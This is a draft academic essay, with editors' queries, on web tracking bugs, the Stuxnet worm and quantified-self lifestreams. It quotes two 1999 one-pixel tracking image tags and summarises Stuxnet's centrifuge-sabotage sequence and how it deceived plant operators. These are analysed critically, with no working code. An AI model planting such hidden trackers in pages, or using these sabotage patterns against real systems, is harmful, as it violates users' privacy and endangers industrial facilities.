&amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior, but also [Eds: use 'and' instead of 'but also' as these acts are not that different?] send various information about the user back to their servers. &lt;br /&gt;
&lt;br /&gt;
Originally designed as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were designed to enable webpages and sites to store the current collection of data about a user, or what is called ‘State’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour, and collect data and information about users raises important privacy implications, but it also facilitates the rise of so-called behaviour marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245). &lt;br /&gt;
&lt;br /&gt;
Fortunately, we are seeing the creation of a number of useful software projects to allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company] it is described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code run in the browser without the knowledge of the user, which if it should be observed, looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999): &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;(http://ad.doubleclick.net/ad/pixel.quicken/NEW)&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;(http://media.preferences.com/ping?&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any) &amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;group=register&amp;amp;amp; time=1999.10.27.20.5 6.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique to reduce the readability of the code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again Ghostery (2012b) usefully supplies us with some general information on the web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)', the data is not shared with third parties but no information is given on their data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behavior, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal, 2012). [Eds: please check that the single and double quotation marks here are correct]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second guess, tempt, direct and nudge behavior in particular directions. Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen in terms of relative size of encounter, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor to each website at [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) is generating $189 per user, at [http://www.businessinsider.com/blackboard/google Google] (search) it is generating $24 per user, and although Facebook (social networking) is only generating $4 per user, this is a rapidly growing number (Yarrow, 2011).&amp;amp;nbsp; Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc. is increasingly becomong extremely profitable. Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into five main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media]&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers. (web site operators) Example: [http://www.burstmedia.com/ Burst Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. [http://www.experian.com/ Experian] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are serviced through this data. Example: Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitor when they place ads on third party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld]&amp;lt;br&amp;gt; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2010)]] &amp;lt;br&amp;gt; ''Image 1: Display Advertising Technology Landscape (Luma, 2010)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs perform part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto and later confirmed in testimony to a U.S. House of Representatives subcommittee that it's ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006). &lt;br /&gt;
&lt;br /&gt;
As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, certainly is keen to avoid regulation and keeps itself very much to itself in order to avoid raising too much unwarranted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the do not track header and there is currently no legal requirement that they do so in the US, or elsewhere (W3C, 2012). Although see the current debate over the EU ePrivacy Directive where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012). [Eds: would this final point be better in a footnote?]&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
One of the newer, and perhaps indicative direction of travel of these new web bugs under development is called [http://www.persianstat.ir/ PersianStat], which claims 'an eye on 1091622 websites': an Iranian web tracking and data analytics website which shows that this new code ecology is not purely a Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in use of these tracker technologies. Pew (2012) found, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of&amp;amp;nbsp;Americans said they would &amp;quot;not be okay&amp;quot; with&amp;amp;nbsp;being tracked (because it would be an invasion&amp;amp;nbsp;of privacy)… Only 23 percent said they'd be &amp;quot;okay&amp;quot; with&amp;amp;nbsp;tracking (because it would lead to better and&amp;amp;nbsp;more personalized search results)…Despite all those high-percentage objections&amp;amp;nbsp;to the idea of being tracked, less than half of&amp;amp;nbsp;the people surveyed -- 38 percent -- said they&amp;amp;nbsp;knew of ways to control the data collected&amp;amp;nbsp;about them. (Garber, 2012; Pew, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data which is in turn sold to advertisers and marketing companies shows that this is an unstable situation. It also serves to demonstrate the extent&amp;amp;nbsp;to which users are just not aware of the subterranean depths of their computational devices and the ability&amp;amp;nbsp;of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the impression to the user that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). An issue helpfully illustrated by the next case study of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
This next example is a computer worm called Stuxnet,[6] which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’, that is, the location it was designed to attack, and activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. Its name, ‘Stuxnet,’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’, the first part, 'stu', comes from the (.stub) file, mrxcls.sys; and the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, like a test facility to model a nuclear plant, to create and launch it (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;The Stuxnet worm works by undertaking a very complex stealth infection and covers its tracks by recording data from the nuclear processing system which it then plays back to the operators to disguise that it is actually gently causing the centifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals so an infected system does not exhibit abnormal behavior and therefore raise alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the sabotaged effort, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010).&amp;amp;nbsp;A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Assocated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June, 2012, and hence hide its tracks. As Zetter explains: &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is “very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically,”… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is interesting because it is not a general purpose attack, but designed to unload its digital warheads under specific conditions against a specific threat target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine. &lt;br /&gt;
&lt;br /&gt;
Indeed, there has been a great deal of speculation about whether a state would have been required to develop it due to the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexities and structure of the worm mean that at least thirty people would have been working on it simultaneously to build such a worm (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, using a set of techniques that are not public nor known by the developer of the attacked system, in this case Microsoft and Siemens. In actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach to its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLCs (Programmable Logic Controllers) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did' (quoted in Zetter, 2010). &lt;br /&gt;
&lt;br /&gt;
The two chief capabilities of Stuxnet are: (1) to identify its target precisely using a number of software based markers that give the physical identity of the location away. Indeed, ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b) and (2) the capability to disengage control systems from physical systems and to provide a stealth infection into the computer system that would fool the operators of the plant (also known as a ‘man-in-the-middle attack’). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, (315), was designed to slowly reduce the speed of rotors leading to cracks and failures, and the second larger warhead, (417), manipulated valves in the centrifuge and faking industrial process control sensor signals by modeling the centifuges which were grouped into 164 cascades (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards,[8] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a)&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The name Stuxnet origin is hypothesized from an analysis of the approximately 15,000 lines of programming code. This was a close reading and reconstruction of the programming logic by taking the machine code, disassembling it and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what the code was doing (Langner, 2011). Indeed, as part of this process a reference to “Myrtus” was discovered, and the link made to 'Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus. Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see table 1).&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran -&amp;amp;nbsp;52.2% &lt;br /&gt;
**Indonesia -&amp;amp;nbsp;17.4% &lt;br /&gt;
**India -&amp;amp;nbsp;11.3% &lt;br /&gt;
**Pakistan -&amp;amp;nbsp;3.6% &lt;br /&gt;
**Uzbekistan-&amp;amp;nbsp;2.6% &lt;br /&gt;
**Russia -&amp;amp;nbsp;2.1% &lt;br /&gt;
**Kazakhstan -&amp;amp;nbsp;1.3% &lt;br /&gt;
**Rest of World -&amp;amp;nbsp;9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized at targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But of course, once the code for undertaking this kind of sophisticated cyberattack is out in the wild it is relatively trivial to decode the computer code and learn techniques that would have taken many years of development in a very short time. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit with purposes linked to the collection of the data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the “Tilded” [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The increased ability of software and code via computational devices to covertly monitor, control and mediate, both positively and negatively, is not just a case of interventions for deceiving the human and non-human actors that make up part of these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems as part of the notion of lifestreams, and more particularly the quantified self movement. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Lastly, I want to turn to connect these developments in web-bugs and worms with the growth in the use of self-monitoring technologies called lifestreaming, or the notion of the quantified self.[11] These have expanded in recent years as the ‘real-time streams’ platforms have expanded, like Twitter and Facebook. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re&amp;amp;nbsp;with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', who argue that the, &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as “self-tracking”, “body hacking” or “self-quantifying”. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This phenomena of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. This closes the loop of personal information online, which, although it remains notionally private, is stored and accessed by corporations who wish to use this biodata for data mining and innovation surfacing. For example: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband], for example, has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Lifestreams were originally an idea from David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), which they described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents --- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and &amp;quot;compress&amp;quot; large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
